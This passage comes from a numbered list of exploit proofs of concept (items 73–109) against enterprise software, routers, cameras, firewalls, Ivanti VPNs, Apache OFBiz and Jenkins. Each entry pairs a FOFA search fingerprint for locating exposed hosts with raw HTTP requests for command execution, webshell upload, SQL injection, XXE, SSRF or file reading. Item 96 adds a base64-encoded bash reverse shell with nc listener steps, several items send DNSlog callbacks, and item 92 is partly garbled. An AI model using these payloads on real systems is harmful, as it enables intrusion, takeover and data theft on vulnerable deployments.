S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon (致远) M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec (新开普) campus service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software system UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) traffic-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp endpoint arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视科技) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The EXP request is as follows; it drops a Godzilla (哥斯拉) webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Tosei (Japan) self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. DBAppSecurity (安恒) MingYu (明御) security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. DBAppSecurity (安恒) MingYu (明御) security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision (海康威视) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视运行管理中心session命令执行
& a, I; }# p  x( E) v* O" l" v) J1 Q" SFastjson命令执行
9 c: g9 F' O1 i! V6 B) T' R& Ghunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"2 \7 r) y8 D3 S/ z
POST /center/api/session HTTP/1.1" H7 [- A8 y, H
Host:( m8 o. s! g4 Q* A
Accept: application/json, text/plain, */*
% g* A+ c0 D9 r1 q# i+ _Accept-Encoding: gzip, deflate5 w- S/ H2 g$ w3 {. c3 \# N
X-Requested-With: XMLHttpRequest
% i$ m( H3 j6 `/ p' |9 K' zContent-Type: application/json;charset=UTF-8
, y7 }8 o5 F; b4 zX-Language-Type: zh_CN
% p3 L6 C' v% LTestcmd: echo test
: \& Q0 N. }0 y: `4 I+ CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36) r1 G7 g* r% J, s% ^' @9 U
Accept-Language: zh-CN,zh;q=0.9
, f5 Z# h1 \# F! ^7 Z* R6 p' `3 ~Content-Length: 5778
5 H$ Y* j* M# \4 n
' v% Z' U: ]* `/ |PAYLOAD( Z, j. {; t2 F" d

! b0 F  L) @! B) ~8 P9 S. f9 m# @1 F. q# ^7 q- h' H) ]2 n; X
93. QiAnXin Wangshen SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

Verify the upload:
GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. QiAnXin Wangshen SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

Verify the upload (the file name must match the one uploaded above):
GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated value for the placeholder in the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz < 18.12.11 ProgramExport groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell. Start a listener on the attacking host (Kali):
nc -lvp 7777

Then send the following; the base64 is a URL-encoded `bash -i >& /dev/tcp/192.168.40.128/7777 0>&1`, so the listener address must be replaced with your own:
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo>
        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
        <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
      </ds:SignedInfo>
      <ds:SignatureValue>qwerty</ds:SignatureValue>
      <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
        <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/>
        <ds:X509Data/>
      </ds:KeyInfo>
      <ds:Object></ds:Object>
    </ds:Signature>
  </soap:Body>
</soap:Envelope>

A callback to the RetrievalMethod URI confirms the SSRF.

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 of the following XML:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Response on the download side (the file contents come back inside the CLI error text):
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
 [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

